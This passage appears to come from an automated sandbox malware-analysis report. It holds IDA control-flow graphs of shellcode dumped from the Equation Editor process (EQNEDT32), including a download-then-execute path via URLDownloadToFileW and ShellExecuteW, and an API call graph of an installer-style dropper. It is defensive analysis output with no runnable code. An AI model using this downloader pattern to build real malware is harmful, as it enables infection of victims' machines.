                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExecuteExitProcessShell
                                                        • String ID:
                                                        • API String ID: 1124553745-0
                                                        • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                        • Instruction ID: ae8d959396642751d9700ed8eb4e0fbfe328c88a0187a6c8db441a2358a3b86d
                                                        • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                        • Instruction Fuzzy Hash: E4012DD9E5434221EB30E6684F46BFAAF55EF51700FCC845BBD91041C5D594A1C3CB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 036D0518 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 245 36d0518-36d051a 247 36d051f-36d0525 245->247 248 36d051a call 36d052d 245->248 249 36d058c-36d0598 247->249 250 36d0527-36d0547 ShellExecuteW call 36d0552 247->250 248->247 251 36d059b 249->251 259 36d0549 250->259 260 36d05b2-36d05b6 250->260 253 36d059d-36d05a1 251->253 254 36d05a3-36d05a7 251->254 253->254 256 36d05af 253->256 257 36d05bc-36d05be 254->257 258 36d05a9-36d05ad 254->258 256->260 261 36d05ce-36d05cf 257->261 258->256 258->257 259->251 262 36d054b 259->262 263 36d05b8 260->263 264 36d05ba 260->264 262->257 265 36d054d-36d0557 ExitProcess 262->265 263->257 264->257 266 36d05c0-36d05c9 264->266 269 36d05cb 266->269 270 36d0592-36d0595 266->270 269->261 270->266 272 36d0597 270->272 272->251
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExecuteExitProcessShell
                                                        • String ID:
                                                        • API String ID: 1124553745-0
                                                        • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                        • Instruction ID: ef58a22b286a26baecf874dd26c0572e2df1f5ce5ba7a4bffacae0432c9729ec
                                                        • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                        • Instruction Fuzzy Hash: DC012DE4E4834131E771E6784F89FAEEE85EF81704F98845EFD9109182C2945583CB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 036D0552 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 273 36d0552-36d0557 ExitProcess
                                                        APIs
                                                        • ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                        • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                        • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                        • Instruction Fuzzy Hash:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 036D0559 Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 275 36d0559-36d0564 GetPEB 276 36d0567-36d0578 call 36d0581 275->276 279 36d057a-36d057e 276->279
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                        • Instruction ID: 69244eebd672be5baffc46ea101e24e3dc8dfb8fa6d0471e41b4dfe7c6b7f838
                                                        • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                        • Instruction Fuzzy Hash: F5D052B1612502CFC304EB04CA80E16F36AFFC8620F28C268E8004BB19C330EC92CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 036D03EF Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 280 36d03ef-36d0416 ExitProcess call 36d0408 call 36d0424 285 36d0469-36d0488 280->285 286 36d0419 280->286 289 36d048a-36d0492 285->289 288 36d041b-36d041e 286->288 286->289 290 36d0486-36d0487 288->290 291 36d0421 288->291 290->289 292 36d0496-36d04a3 call 36d04ae 291->292 293 36d0423-36d0432 call 36d044b 291->293 298 36d04a4-36d04a9 292->298 293->298 299 36d0434-36d0439 293->299 302 36d04ac-36d04b5 298->302 299->298 301 36d043b 299->301 301->302 303 36d043d-36d0441 301->303 304 36d04b7-36d04b9 302->304 303->292 305 36d0443 303->305 306 36d04bf-36d0501 URLDownloadToFileW 304->306 307 36d04ba call 36d04ff 304->307 305->304 309 36d0445-36d0466 call 36d047f 305->309 310 36d0508-36d0525 call 36d052d 306->310 311 36d0503 call 36d0518 306->311 307->306 309->285 318 36d058c-36d0598 310->318 319 36d0527-36d0547 ShellExecuteW call 36d0552 310->319 311->310 320 36d059b 318->320 328 36d0549 319->328 329 36d05b2-36d05b6 319->329 322 36d059d-36d05a1 320->322 323 36d05a3-36d05a7 320->323 322->323 325 36d05af 322->325 326 36d05bc-36d05be 323->326 327 36d05a9-36d05ad 323->327 325->329 330 36d05ce-36d05cf 326->330 327->325 327->326 328->320 331 36d054b 328->331 332 36d05b8 329->332 333 36d05ba 329->333 331->326 334 36d054d-36d0557 ExitProcess 331->334 332->326 333->326 335 36d05c0-36d05c9 333->335 338 36d05cb 335->338 339 36d0592-36d0595 335->339 338->330 339->335 341 36d0597 339->341 341->320
                                                        APIs
                                                        • ExitProcess.KERNEL32(036D03DD), ref: 036D03EF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 012a95e31786f55606f2aae6733b7eafa3fe3ec4e00fc661099f0c1eee8d72ce
                                                        • Instruction ID: 5555957f96f1bc465c946948e81433601c1ede5411ded454f3204090e2f0d2d5
                                                        • Opcode Fuzzy Hash: 012a95e31786f55606f2aae6733b7eafa3fe3ec4e00fc661099f0c1eee8d72ce
                                                        • Instruction Fuzzy Hash: 7611D056C0E7C0DFC302E7705A6999AFF20BD63110F5C8ACFC4C44E1A3E6659A0AC3A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:16.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:16.3%
                                                        Total number of Nodes:1372
                                                        Total number of Limit Nodes:22
                                                        execution_graph 3058 401941 3059 401943 3058->3059 3064 402da6 3059->3064 3065 402db2 3064->3065 3106 4066ab 3065->3106 3068 401948 3070 405d7a 3068->3070 3148 406045 3070->3148 3073 405da2 DeleteFileW 3103 401951 3073->3103 3074 405db9 3076 405ed9 3074->3076 3162 40666e lstrcpynW 3074->3162 3076->3103 3191 4069a4 FindFirstFileW 3076->3191 3077 405ddf 3078 405df2 3077->3078 3079 405de5 lstrcatW 3077->3079 3163 405f89 lstrlenW 3078->3163 3080 405df8 3079->3080 3083 405e08 lstrcatW 3080->3083 3085 405e13 lstrlenW FindFirstFileW 3080->3085 3083->3085 3085->3076 3086 405e35 3085->3086 3089 405ebc FindNextFileW 3086->3089 3099 405d7a 60 API calls 3086->3099 3102 4056d0 24 API calls 3086->3102 3167 40666e lstrcpynW 3086->3167 3168 405d32 3086->3168 3176 4056d0 3086->3176 3187 40642e MoveFileExW 3086->3187 3089->3086 3092 405ed2 FindClose 3089->3092 3090 405d32 5 API calls 3093 405f14 3090->3093 3092->3076 3094 405f18 3093->3094 3095 405f2e 3093->3095 3098 4056d0 24 API calls 3094->3098 3094->3103 3097 4056d0 24 API calls 3095->3097 3097->3103 3100 405f25 3098->3100 3099->3086 3101 40642e 36 API calls 3100->3101 3101->3103 3102->3089 3110 4066b8 3106->3110 3107 4068db 3108 402dd3 3107->3108 3139 40666e lstrcpynW 3107->3139 3108->3068 3123 4068f5 3108->3123 3110->3107 3111 4068a9 lstrlenW 3110->3111 3115 4066ab 10 API calls 3110->3115 3116 4067c0 GetSystemDirectoryW 3110->3116 3117 4067d3 GetWindowsDirectoryW 3110->3117 3118 406802 SHGetSpecialFolderLocation 3110->3118 3119 40684a lstrcatW 3110->3119 3120 4066ab 10 API calls 3110->3120 3121 4068f5 5 API calls 3110->3121 3132 40653c 3110->3132 3137 4065b5 wsprintfW 3110->3137 3138 40666e lstrcpynW 3110->3138 3111->3110 3115->3111 3116->3110 3117->3110 3118->3110 3122 40681a SHGetPathFromIDListW CoTaskMemFree 3118->3122 3119->3110 3120->3110 3121->3110 3122->3110 3124 406902 3123->3124 3126 406978 3124->3126 3127 40696b CharNextW 3124->3127 3130 406957 CharNextW 3124->3130 3131 406966 CharNextW 3124->3131 3144 405f6a 3124->3144 3125 40697d CharPrevW 3125->3126 3126->3125 3128 40699e 3126->3128 3127->3124 3127->3126 3128->3068 3130->3124 3131->3127 3140 4064db 3132->3140 3135 406570 RegQueryValueExW RegCloseKey 3136 4065a0 3135->3136 3136->3110 3137->3110 3138->3110 3139->3108 3141 4064ea 3140->3141 3142 4064f3 RegOpenKeyExW 3141->3142 3143 4064ee 3141->3143 3142->3143 3143->3135 3143->3136 3145 405f70 3144->3145 3146 405f86 3145->3146 3147 405f77 CharNextW 3145->3147 3146->3124 3147->3145 3197 40666e lstrcpynW 3148->3197 3150 406056 3198 405fe8 CharNextW CharNextW 3150->3198 3153 405d9a 3153->3073 3153->3074 3154 4068f5 5 API calls 3160 40606c 3154->3160 3155 40609d lstrlenW 3156 4060a8 3155->3156 3155->3160 3157 405f3d 3 API calls 3156->3157 3159 4060ad GetFileAttributesW 3157->3159 3158 4069a4 2 API calls 3158->3160 3159->3153 3160->3153 3160->3155 3160->3158 3161 405f89 2 API calls 3160->3161 3161->3155 3162->3077 3164 405f97 3163->3164 3165 405fa9 3164->3165 3166 405f9d CharPrevW 3164->3166 3165->3080 3166->3164 3166->3165 3167->3086 3204 406139 GetFileAttributesW 3168->3204 3171 405d5f 3171->3086 3172 405d55 DeleteFileW 3174 405d5b 3172->3174 3173 405d4d RemoveDirectoryW 3173->3174 3174->3171 3175 405d6b SetFileAttributesW 3174->3175 3175->3171 3177 4056eb 3176->3177 3178 40578d 3176->3178 3179 405707 lstrlenW 3177->3179 3180 4066ab 17 API calls 3177->3180 3178->3086 3181 405730 3179->3181 3182 405715 lstrlenW 3179->3182 3180->3179 3184 405743 3181->3184 3185 405736 SetWindowTextW 3181->3185 3182->3178 3183 405727 lstrcatW 3182->3183 3183->3181 3184->3178 3186 405749 SendMessageW SendMessageW SendMessageW 3184->3186 3185->3184 3186->3178 3188 40644f 3187->3188 3189 406442 3187->3189 3188->3086 3207 4062b4 3189->3207 3192 405efe 3191->3192 3193 4069ba FindClose 3191->3193 3192->3103 3194 405f3d lstrlenW CharPrevW 3192->3194 3193->3192 3195 405f08 3194->3195 3196 405f59 lstrcatW 3194->3196 3195->3090 3196->3195 3197->3150 3199 406005 3198->3199 3200 406017 3198->3200 3199->3200 3201 406012 CharNextW 3199->3201 3202 405f6a CharNextW 3200->3202 3203 40603b 3200->3203 3201->3203 3202->3200 3203->3153 3203->3154 3205 405d3e 3204->3205 3206 40614b SetFileAttributesW 3204->3206 3205->3171 3205->3172 3205->3173 3206->3205 3208 4062e4 3207->3208 3209 40630a GetShortPathNameW 3207->3209 3234 40615e GetFileAttributesW CreateFileW 3208->3234 3211 406429 3209->3211 3212 40631f 3209->3212 3211->3188 3212->3211 3214 406327 wsprintfA 3212->3214 3213 4062ee CloseHandle GetShortPathNameW 3213->3211 3215 406302 3213->3215 3216 4066ab 17 API calls 3214->3216 3215->3209 3215->3211 3217 40634f 3216->3217 3235 40615e GetFileAttributesW CreateFileW 3217->3235 3219 40635c 3219->3211 3220 40636b GetFileSize GlobalAlloc 3219->3220 3221 406422 CloseHandle 3220->3221 3222 40638d 3220->3222 3221->3211 3236 4061e1 ReadFile 3222->3236 3227 4063c0 3229 4060c3 4 API calls 3227->3229 3228 4063ac lstrcpyA 3230 4063ce 3228->3230 3229->3230 3231 406405 SetFilePointer 3230->3231 3243 406210 WriteFile 3231->3243 3234->3213 3235->3219 3237 4061ff 3236->3237 3237->3221 3238 4060c3 lstrlenA 3237->3238 3239 406104 lstrlenA 3238->3239 3240 40610c 3239->3240 3241 4060dd lstrcmpiA 3239->3241 3240->3227 3240->3228 3241->3240 3242 4060fb CharNextA 3241->3242 3242->3239 3244 40622e GlobalFree 3243->3244 3244->3221 3245 4015c1 3246 402da6 17 API calls 3245->3246 3247 4015c8 3246->3247 3248 405fe8 4 API calls 3247->3248 3260 4015d1 3248->3260 3249 401631 3251 401663 3249->3251 3252 401636 3249->3252 3250 405f6a CharNextW 3250->3260 3255 401423 24 API calls 3251->3255 3272 401423 3252->3272 3261 40165b 3255->3261 3259 40164a SetCurrentDirectoryW 3259->3261 3260->3249 3260->3250 3262 401617 GetFileAttributesW 3260->3262 3264 405c39 3260->3264 3267 405b9f CreateDirectoryW 3260->3267 3276 405c1c CreateDirectoryW 3260->3276 3262->3260 3279 406a3b GetModuleHandleA 3264->3279 3268 405bf0 GetLastError 3267->3268 3269 405bec 3267->3269 3268->3269 3270 405bff SetFileSecurityW 3268->3270 3269->3260 3270->3269 3271 405c15 GetLastError 3270->3271 3271->3269 3273 4056d0 24 API calls 3272->3273 3274 401431 3273->3274 3275 40666e lstrcpynW 3274->3275 3275->3259 3277 405c30 GetLastError 3276->3277 3278 405c2c 3276->3278 3277->3278 3278->3260 3280 406a61 GetProcAddress 3279->3280 3281 406a57 3279->3281 3283 405c40 3280->3283 3285 4069cb GetSystemDirectoryW 3281->3285 3283->3260 3284 406a5d 3284->3280 3284->3283 3286 4069ed wsprintfW LoadLibraryExW 3285->3286 3286->3284 3760 401c43 3782 402d84 3760->3782 3762 401c4a 3763 402d84 17 API calls 3762->3763 3764 401c57 3763->3764 3765 401c6c 3764->3765 3766 402da6 17 API calls 3764->3766 3767 401c7c 3765->3767 3768 402da6 17 API calls 3765->3768 3766->3765 3769 401cd3 3767->3769 3770 401c87 3767->3770 3768->3767 3771 402da6 17 API calls 3769->3771 3772 402d84 17 API calls 3770->3772 3773 401cd8 3771->3773 3774 401c8c 3772->3774 3775 402da6 17 API calls 3773->3775 3776 402d84 17 API calls 3774->3776 3777 401ce1 FindWindowExW 3775->3777 3778 401c98 3776->3778 3781 401d03 3777->3781 3779 401cc3 SendMessageW 3778->3779 3780 401ca5 SendMessageTimeoutW 3778->3780 3779->3781 3780->3781 3783 4066ab 17 API calls 3782->3783 3784 402d99 3783->3784 3784->3762 3785 405644 3786 405654 3785->3786 3787 405668 3785->3787 3789 4056b1 3786->3789 3790 40565a 3786->3790 3788 405670 IsWindowVisible 3787->3788 3796 405687 3787->3796 3788->3789 3791 40567d 3788->3791 3792 4056b6 CallWindowProcW 3789->3792 3793 404616 SendMessageW 3790->3793 3798 404f85 SendMessageW 3791->3798 3795 405664 3792->3795 3793->3795 3796->3792 3803 405005 3796->3803 3799 404fe4 SendMessageW 3798->3799 3800 404fa8 GetMessagePos ScreenToClient SendMessageW 3798->3800 3801 404fdc 3799->3801 3800->3801 3802 404fe1 3800->3802 3801->3796 3802->3799 3812 40666e lstrcpynW 3803->3812 3805 405018 3813 4065b5 wsprintfW 3805->3813 3807 405022 3808 40140b 2 API calls 3807->3808 3809 40502b 3808->3809 3814 40666e lstrcpynW 3809->3814 3811 405032 3811->3789 3812->3805 3813->3807 3814->3811 3815 4028c4 3816 4028ca 3815->3816 3817 4028d2 FindClose 3816->3817 3818 402c2a 3816->3818 3817->3818 3316 403646 SetErrorMode GetVersionExW 3317 4036d0 3316->3317 3318 403698 GetVersionExW 3316->3318 3319 403729 3317->3319 3320 406a3b 5 API calls 3317->3320 3318->3317 3321 4069cb 3 API calls 3319->3321 3320->3319 3322 40373f lstrlenA 3321->3322 3322->3319 3323 40374f 3322->3323 3324 406a3b 5 API calls 3323->3324 3325 403756 3324->3325 3326 406a3b 5 API calls 3325->3326 3327 40375d 3326->3327 3328 406a3b 5 API calls 3327->3328 3329 403769 #17 OleInitialize SHGetFileInfoW 3328->3329 3406 40666e lstrcpynW 3329->3406 3332 4037b6 GetCommandLineW 3407 40666e lstrcpynW 3332->3407 3334 4037c8 3335 405f6a CharNextW 3334->3335 3336 4037ee CharNextW 3335->3336 3346 4037ff 3336->3346 3337 4038fd 3338 403911 GetTempPathW 3337->3338 3408 403615 3338->3408 3340 403929 3341 403983 DeleteFileW 3340->3341 3342 40392d GetWindowsDirectoryW lstrcatW 3340->3342 3418 4030d0 GetTickCount GetModuleFileNameW 3341->3418 3344 403615 12 API calls 3342->3344 3343 405f6a CharNextW 3343->3346 3347 403949 3344->3347 3346->3337 3346->3343 3350 4038ff 3346->3350 3347->3341 3349 40394d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3347->3349 3348 403996 3351 403b72 ExitProcess OleUninitialize 3348->3351 3355 403a4b 3348->3355 3361 405f6a CharNextW 3348->3361 3354 403615 12 API calls 3349->3354 3503 40666e lstrcpynW 3350->3503 3352 403b82 3351->3352 3353 403b97 3351->3353 3508 405cce 3352->3508 3358 403c15 ExitProcess 3353->3358 3359 403b9f GetCurrentProcess OpenProcessToken 3353->3359 3360 40397b 3354->3360 3447 403d1d 3355->3447 3366 403be5 3359->3366 3367 403bb6 LookupPrivilegeValueW AdjustTokenPrivileges 3359->3367 3360->3341 3360->3351 3372 4039b8 3361->3372 3363 403a5a 3363->3351 3368 406a3b 5 API calls 3366->3368 3367->3366 3371 403bec 3368->3371 3369 403a21 3374 406045 18 API calls 3369->3374 3370 403a62 3373 405c39 5 API calls 3370->3373 3375 403c01 ExitWindowsEx 3371->3375 3376 403c0e 3371->3376 3372->3369 3372->3370 3377 403a67 lstrcatW 3373->3377 3378 403a2d 3374->3378 3375->3358 3375->3376 3512 40140b 3376->3512 3380 403a83 lstrcatW lstrcmpiW 3377->3380 3381 403a78 lstrcatW 3377->3381 3378->3351 3504 40666e lstrcpynW 3378->3504 3380->3363 3382 403aa3 3380->3382 3381->3380 3384 403aa8 3382->3384 3385 403aaf 3382->3385 3387 405b9f 4 API calls 3384->3387 3388 405c1c 2 API calls 3385->3388 3386 403a40 3505 40666e lstrcpynW 3386->3505 3390 403aad 3387->3390 3391 403ab4 SetCurrentDirectoryW 3388->3391 3390->3391 3392 403ad1 3391->3392 3393 403ac6 3391->3393 3507 40666e lstrcpynW 3392->3507 3506 40666e lstrcpynW 3393->3506 3396 4066ab 17 API calls 3397 403b13 DeleteFileW 3396->3397 3398 403b1f CopyFileW 3397->3398 3403 403ade 3397->3403 3398->3403 3399 403b69 3400 40642e 36 API calls 3399->3400 3400->3363 3401 40642e 36 API calls 3401->3403 3402 4066ab 17 API calls 3402->3403 3403->3396 3403->3399 3403->3401 3403->3402 3404 405c51 2 API calls 3403->3404 3405 403b53 CloseHandle 3403->3405 3404->3403 3405->3403 3406->3332 3407->3334 3409 4068f5 5 API calls 3408->3409 3411 403621 3409->3411 3410 40362b 3410->3340 3411->3410 3412 405f3d 3 API calls 3411->3412 3413 403633 3412->3413 3414 405c1c 2 API calls 3413->3414 3415 403639 3414->3415 3515 40618d 3415->3515 3519 40615e GetFileAttributesW CreateFileW 3418->3519 3420 403113 3446 403120 3420->3446 3520 40666e lstrcpynW 3420->3520 3422 403136 3423 405f89 2 API calls 3422->3423 3424 40313c 3423->3424 3521 40666e lstrcpynW 3424->3521 3426 403147 GetFileSize 3427 403246 3426->3427 3429 40315e 3426->3429 3522 40302e 3427->3522 3429->3427 3433 4032e4 3429->3433 3441 40302e 32 API calls 3429->3441 3429->3446 3553 4035e8 3429->3553 3431 403289 GlobalAlloc 3436 40618d 2 API calls 3431->3436 3434 40302e 32 API calls 3433->3434 3434->3446 3437 4032b4 CreateFileW 3436->3437 3439 4032ee 3437->3439 3437->3446 3438 40326a 3440 4035e8 ReadFile 3438->3440 3537 4035fe SetFilePointer 3439->3537 3443 403275 3440->3443 3441->3429 3443->3431 3443->3446 3444 4032fc 3538 403377 3444->3538 3446->3348 3448 406a3b 5 API calls 3447->3448 3449 403d31 3448->3449 3450 403d37 3449->3450 3451 403d49 3449->3451 3581 4065b5 wsprintfW 3450->3581 3452 40653c 3 API calls 3451->3452 3453 403d79 3452->3453 3455 403d98 lstrcatW 3453->3455 3457 40653c 3 API calls 3453->3457 3456 403d47 3455->3456 3573 403ff3 3456->3573 3457->3455 3460 406045 18 API calls 3461 403dca 3460->3461 3462 403e5e 3461->3462 3464 40653c 3 API calls 3461->3464 3463 406045 18 API calls 3462->3463 3465 403e64 3463->3465 3466 403dfc 3464->3466 3467 403e74 LoadImageW 3465->3467 3468 4066ab 17 API calls 3465->3468 3466->3462 3471 403e1d lstrlenW 3466->3471 3475 405f6a CharNextW 3466->3475 3469 403f1a 3467->3469 3470 403e9b RegisterClassW 3467->3470 3468->3467 3474 40140b 2 API calls 3469->3474 3472 403ed1 SystemParametersInfoW CreateWindowExW 3470->3472 3473 403f24 3470->3473 3476 403e51 3471->3476 3477 403e2b lstrcmpiW 3471->3477 3472->3469 3473->3363 3478 403f20 3474->3478 3480 403e1a 3475->3480 3479 405f3d 3 API calls 3476->3479 3477->3476 3481 403e3b GetFileAttributesW 3477->3481 3478->3473 3482 403ff3 18 API calls 3478->3482 3483 403e57 3479->3483 3480->3471 3484 403e47 3481->3484 3485 403f31 3482->3485 3582 40666e lstrcpynW 3483->3582 3484->3476 3487 405f89 2 API calls 3484->3487 3488 403fc0 3485->3488 3489 403f3d ShowWindow 3485->3489 3487->3476 3583 4057a3 OleInitialize 3488->3583 3491 4069cb 3 API calls 3489->3491 3495 403f55 3491->3495 3492 403fc6 3493 403fe2 3492->3493 3496 403fca 3492->3496 3497 40140b 2 API calls 3493->3497 3494 403f63 GetClassInfoW 3499 403f77 GetClassInfoW RegisterClassW 3494->3499 3500 403f8d DialogBoxParamW 3494->3500 3495->3494 3498 4069cb 3 API calls 3495->3498 3496->3473 3501 40140b 2 API calls 3496->3501 3497->3473 3498->3494 3499->3500 3502 40140b 2 API calls 3500->3502 3501->3473 3502->3473 3503->3338 3504->3386 3505->3355 3506->3392 3507->3403 3509 405ce3 3508->3509 3510 403b8f ExitProcess 3509->3510 3511 405cf7 MessageBoxIndirectW 3509->3511 3511->3510 3513 401389 2 API calls 3512->3513 3514 401420 3513->3514 3514->3358 3516 40619a GetTickCount GetTempFileNameW 3515->3516 3517 4061d0 3516->3517 3518 403644 3516->3518 3517->3516 3517->3518 3518->3340 3519->3420 3520->3422 3521->3426 3523 403057 3522->3523 3524 40303f 3522->3524 3527 403067 GetTickCount 3523->3527 3528 40305f 3523->3528 3525 403048 DestroyWindow 3524->3525 3526 40304f 3524->3526 3525->3526 3526->3431 3526->3446 3556 4035fe SetFilePointer 3526->3556 3527->3526 3530 403075 3527->3530 3529 406a77 2 API calls 3528->3529 3529->3526 3531 4030aa CreateDialogParamW ShowWindow 3530->3531 3532 40307d 3530->3532 3531->3526 3532->3526 3557 403012 3532->3557 3534 40308b wsprintfW 3535 4056d0 24 API calls 3534->3535 3536 4030a8 3535->3536 3536->3526 3537->3444 3539 4033a2 3538->3539 3540 403386 SetFilePointer 3538->3540 3560 40347f GetTickCount 3539->3560 3540->3539 3543 40343f 3543->3446 3544 4061e1 ReadFile 3545 4033c2 3544->3545 3545->3543 3546 40347f 38 API calls 3545->3546 3547 4033d9 3546->3547 3547->3543 3548 403445 ReadFile 3547->3548 3550 4033e8 3547->3550 3548->3543 3550->3543 3551 4061e1 ReadFile 3550->3551 3552 406210 WriteFile 3550->3552 3551->3550 3552->3550 3554 4061e1 ReadFile 3553->3554 3555 4035fb 3554->3555 3555->3429 3556->3438 3558 403021 3557->3558 3559 403023 MulDiv 3557->3559 3558->3559 3559->3534 3561 4035d7 3560->3561 3562 4034ad 3560->3562 3563 40302e 32 API calls 3561->3563 3572 4035fe SetFilePointer 3562->3572 3569 4033a9 3563->3569 3565 4034b8 SetFilePointer 3568 4034dd 3565->3568 3566 4035e8 ReadFile 3566->3568 3567 40302e 32 API calls 3567->3568 3568->3566 3568->3567 3568->3569 3570 406210 WriteFile 3568->3570 3571 4035b8 SetFilePointer 3568->3571 3569->3543 3569->3544 3570->3568 3571->3561 3572->3565 3574 404007 3573->3574 3590 4065b5 wsprintfW 3574->3590 3576 404078 3591 4040ac 3576->3591 3578 403da8 3578->3460 3579 40407d 3579->3578 3580 4066ab 17 API calls 3579->3580 3580->3579 3581->3456 3582->3462 3594 404616 3583->3594 3585 4057c6 3589 4057ed 3585->3589 3597 401389 3585->3597 3586 404616 SendMessageW 3587 4057ff OleUninitialize 3586->3587 3587->3492 3589->3586 3590->3576 3592 4066ab 17 API calls 3591->3592 3593 4040ba SetWindowTextW 3592->3593 3593->3579 3595 40462e 3594->3595 3596 40461f SendMessageW 3594->3596 3595->3585 3596->3595 3599 401390 3597->3599 3598 4013fe 3598->3585 3599->3598 3600 4013cb MulDiv SendMessageW 3599->3600 3600->3599 3601 4040cb 3602 4040e3 3601->3602 3603 404244 3601->3603 3602->3603 3606 4040ef 3602->3606 3604 404295 3603->3604 3605 404255 GetDlgItem GetDlgItem 3603->3605 3608 4042ef 3604->3608 3620 401389 2 API calls 3604->3620 3694 4045ca 3605->3694 3609 4040fa SetWindowPos 3606->3609 3610 40410d 3606->3610 3614 404616 SendMessageW 3608->3614 3621 40423f 3608->3621 3609->3610 3611 404116 ShowWindow 3610->3611 3612 404158 3610->3612 3615 404231 3611->3615 3616 404136 GetWindowLongW 3611->3616 3617 404160 DestroyWindow 3612->3617 3618 404177 3612->3618 3613 40427f SetClassLongW 3619 40140b 2 API calls 3613->3619 3622 404301 3614->3622 3680 404631 3615->3680 3616->3615 3623 40414f ShowWindow 3616->3623 3624 404574 3617->3624 3625 40417c SetWindowLongW 3618->3625 3626 40418d 3618->3626 3619->3604 3627 4042c7 3620->3627 3629 40140b 2 API calls 3622->3629 3630 404555 DestroyWindow EndDialog 3622->3630 3635 4066ab 17 API calls 3622->3635 3646 4045ca 18 API calls 3622->3646 3649 4045ca 18 API calls 3622->3649 3623->3612 3624->3621 3633 404584 ShowWindow 3624->3633 3625->3621 3626->3615 3631 404199 GetDlgItem 3626->3631 3627->3608 3632 4042cb SendMessageW 3627->3632 3629->3622 3630->3624 3634 4041aa SendMessageW IsWindowEnabled 3631->3634 3636 4041c7 3631->3636 3632->3621 3633->3621 3634->3621 3634->3636 3635->3622 3637 4041d4 3636->3637 3638 4041e7 3636->3638 3639 40421b SendMessageW 3636->3639 3647 4041cc 3636->3647 3637->3639 3637->3647 3641 404204 3638->3641 3642 4041ef 3638->3642 3639->3615 3645 40140b 2 API calls 3641->3645 3644 40140b 2 API calls 3642->3644 3643 404202 3643->3615 3644->3647 3648 40420b 3645->3648 3646->3622 3677 4045a3 3647->3677 3648->3615 3648->3647 3650 40437c GetDlgItem 3649->3650 3651 404391 3650->3651 3652 404399 ShowWindow EnableWindow 3650->3652 3651->3652 3697 4045ec EnableWindow 3652->3697 3654 4043c3 EnableWindow 3659 4043d7 3654->3659 3655 4043dc GetSystemMenu EnableMenuItem SendMessageW 3656 40440c SendMessageW 3655->3656 3655->3659 3656->3659 3658 4040ac 18 API calls 3658->3659 3659->3655 3659->3658 3698 4045ff SendMessageW 3659->3698 3699 40666e lstrcpynW 3659->3699 3661 40443b lstrlenW 3662 4066ab 17 API calls 3661->3662 3663 404451 SetWindowTextW 3662->3663 3664 401389 2 API calls 3663->3664 3666 404462 3664->3666 3665 404495 DestroyWindow 3665->3624 3667 4044af CreateDialogParamW 3665->3667 3666->3621 3666->3622 3666->3665 3668 404490 3666->3668 3667->3624 3669 4044e2 3667->3669 3668->3621 3670 4045ca 18 API calls 3669->3670 3671 4044ed GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3670->3671 3672 401389 2 API calls 3671->3672 3673 404533 3672->3673 3673->3621 3674 40453b ShowWindow 3673->3674 3675 404616 SendMessageW 3674->3675 3676 404553 3675->3676 3676->3624 3678 4045b0 SendMessageW 3677->3678 3679 4045aa 3677->3679 3678->3643 3679->3678 3681 404649 GetWindowLongW 3680->3681 3682 4046f4 3680->3682 3681->3682 3683 40465e 3681->3683 